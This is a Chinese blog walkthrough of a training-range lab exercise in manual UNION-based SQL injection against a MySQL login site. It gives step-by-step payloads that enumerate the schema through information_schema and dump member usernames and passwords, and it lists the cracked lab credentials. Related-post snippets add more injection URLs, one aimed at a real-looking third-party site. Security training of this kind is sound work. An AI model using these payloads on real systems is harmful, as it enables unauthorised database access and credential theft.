mysql 手工sql注入_SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)...

最新推荐文章于 2024-03-12 16:39:52 发布
最新推荐文章于 2024-03-12 16:39:52 发布
阅读量190 收藏 2
点赞数
文章标签: mysql 手工sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39993989/article/details/113493514
版权

0x01

开启靶场我们可以看到登录界面

048bc77765938c5cd7a99f5a378f56af.png

0x02

我们来寻找一下注入点

7cb83f32bf784de5b30355a44cab9cfa.png

利用工具啊D我们可以找到注入点

0x03

76b7d380f1a4e0055e5309147551c4ac.png

可以看到是这样的界面

下面我们来进行检测

我直接给出语句就不一步一步截图了

检测语句:

and 1=1 返回正常

and 1=2 返回错误

order by 4 得到有四个字段数

0x04

利用联合查询来查询回显位置

id=-1%20union%20select%201,2,3,4

判断得到

eafd99ce82e5dd9c1e74b5613df57124.png

可以知道回显在 2 3这两个字段

接下来,构造拼接语句进行查询

使用回显位爆出数据库名和版本

id=-1%20union%20select%201,database(),version(),4

6edb0028f95c2a020817533595002215.png

根据数据库名爆破表名

id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema%20=%20%22mozhe_Discuz_StormGroup%22#

bff578bb2276dee67d8aacc19005e088.png

根据表名爆破列名

id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%22StormGroup_member%22%20#

3eaa061c709a8c53279b851c8fe5bd81.png

爆列内容

id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member%20#

68843ad0a08289b36416d13c0c8dd7a4.png

0x05

这边可以看到存在两个账户

密码是md5解密一下就可以得到两个账号,其中一个登录就可以

账号一:

mozhe

dsan13

账号二:

mozhe

451866

登录就可以拿到flag了

1f93854dd5caca2b9df63cf373757528.png

ok,今天就到这里,关注我,一起学习哦

weixin_39993989
关注
《WEB安全渗透测试》(1)SQL注入实战:union注入
午夜安全
09-30 9646
《WEB安全渗透测试》(1)SQL注入实战:union注入 1)判断是否存在注入URL:http://www.tianchi.com/web/union.php?id=1URL:http://www.tianchi.com/web/union.php?id=1'URL:http://www.tianchi.com/web/union.php?id=1 and 1=1URL:http://www.tianchi.com/web/union.php?id=1 and 1=2发现可能存在SQL注入漏洞。.....
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2283
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
手工注入
weixin_33881050的博客
03-19 57
http://www.zzzz/community/board_list.asp?code=005&id=13 and 1=2 union all (select top 1 1,2,3,4,name,6,7,null,null,null,null,null,null,null,null,null,null,null,null,null from master.dbo.sysdatabas...
mysql注入靶场_靶场练习-墨者学院-sql注入- 手工注入漏洞测试(MySQL数据库-字符型)...
weixin_28733933的博客
02-01 150
背景知识1.Mysql的数据结构mysql中有一个information_schema数据库,用于维护mysql中的其他数据库信息。其中的tables表的TABLE_SCHEMA字段为库名,TABLE_NAME字段为表名;columns表的TABLE_SCHEMA字段为所属的数据库,TABLE_NAME字段为表名,COLUMN_NAME字段为列名。2.手工注入方法。是否存在过滤,是否可绕过。是否可...
mysql手工注入过waf_Mysql 手工注入【常规 Union 查询
weixin_30921875的博客
02-08 175
文章来源于:lsh4ck's Blog在开始真正的注入技巧之前,我们先来大致回顾下必要的 mysql 数据库基础下面是注入 Mysql 时经常会用到的一些单行函数,熟练使用是灵活注入的前提,尤其是在对抗一些 Waf 的时候字符串连接函数,将多个字符串连接成一个字符串,注意,中间只要字符串有一个为空,最后结果也为空 同样是连接多个字符串,但可以在开头指定分隔符,跟 concat()稍微不同,它会自...
浅谈SQL注入中的-1‘ union select 1,2,3#
最新发布
dzqxwzoe的博客
03-12 1580
经过本文的阅读,相信小白已经可以理解SQL注入语句中的这条语句了吧?将上面所有的内容概括为一句话就是大家常说的:判断回显位。当然,这条语句并不是固定的,要根据目标数据库返回的报错信息等各种情况来构造针对目标数据库SQL注入语句。
MySQL笔记.zip_MySQL数据库_SQL__MySQL数据库_SQL_
08-09
MySQL数据库是世界上最受欢迎的开源关系型数据库管理系统之一,它的强大功能和灵活性使其在各种规模的项目中被广泛应用。这份“MySQL笔记”包含了丰富的SQL语言知识,对于初学者和经验丰富的开发者来说都是一份宝贵...
基于MySQLSQL注入攻击(20191202232232).pdf
12-02
标题《基于MySQLSQL注入攻击》所涉及的知识点主要围绕SQL注入攻击的原理、防御以及在基于MySQL数据库环境下实施的攻击案例。具体来看,可以分为以下几个方面: 1. SQL注入的定义与工作原理:SQL注入攻击是一种...
手工注入常用SQL语句.txt
07-18
手工SQL注入通常涉及利用已知漏洞,通过精心构造的SQL语句来探测数据库结构和数据。 ### 2. Access数据库手工SQL注入示例 对于Access数据库,可以通过以下方式进行手工SQL注入: - `and (select id from ...
SQL手工注入漏洞测试(MySQL数据库-字符型)
qq_45883601的博客
12-07 424
进入靶场环境,两个墨币没了。。 然后点击公告,开始手工注入。 1、首先判断是否存在注入点, http://219.153.49.228:47679/new_list.php?id=tingjigonggao%20and%201=1 页面错误,存在注入点,接着用联合查询 ...
SQL注入中的union注入
weixin_43326436的博客
05-01 814
环境自己搭的 union联合,合并,将多条查询语句结果合并成一个结果,union注入攻击手工测试 1.首先要判断是否存在注入点 2.通过order by 1~99 查询字段 首先应该用查询出字段 1. http://127.0.0.1/web/sql/union.php?id=1%20order%20by%201 (注:%20表示空格,) 我这里从1试到了7 到7的时候报错,也就会是说有6个...
渗透测试学习笔记(一)注入-Union注入攻击
weixin_40138844的博客
10-29 751
Mysql5.0及以上版本中,存在一个数据库名 information_schema,里面包含了数据库的库名信息,表名信息,列名信息 information_schema.schemta information_schema.tables. information_schema.columns. table_name 表名 table_schema数据名 column_name列...
SQL手工注入sql盲注
weixin_46668901的博客
10-27 1349
你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片.
突破sql 注入过滤Union+SELECT 继续射下去
天元喜羊羊的博客
08-04 1万+
http://www.myhack58.com/Article/html/3/7/2011/31053.htm  前几今天遇到一个bt 的老外注射点:   //*ps 此点目前流行的注射工具射不 *//   http://cleopatra-sy.com/index.php?content=more_product&id=17      http://cleopatr
Web安全原理剖析(二)——Union注入攻击
热门推荐
Phantom03167的博客
09-04 1万+
Union注入攻击
渗透(四)之MysqlUNION联合注入和报错注入
qq_32719221的博客
09-09 2240
union联合查询注入 UNION操作符用于合并两个或多个SELETC语句的结果集 前提 UNION内部的SELECT语句必须拥有相同数量的列,列也必须拥有相似的数据类型。同时,每条,每条SELECT语句中的列的顺序必须相同 默认情况下,UNION操作符选取不同的值,如果允许重复的值,请使用UNION ALL UNION注入应用场景 只有最后一个SELECT 字句允许有ORDER BY; se...
15分钟了解sql注入(一) union注入
贤鱼的博客
09-24 1896
union注入详细教程
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
mysql 5注入中group_concat的使用
weixin_34375233的博客
08-24 158
mysql中的information_schema 结构用来存储数据库系统信息 information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。  | SCHEMATA ――>存储数据库名的, |——>关键字段:SCHEMA_NAME,表示数据库名称 | TABLES ――>存储表名的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值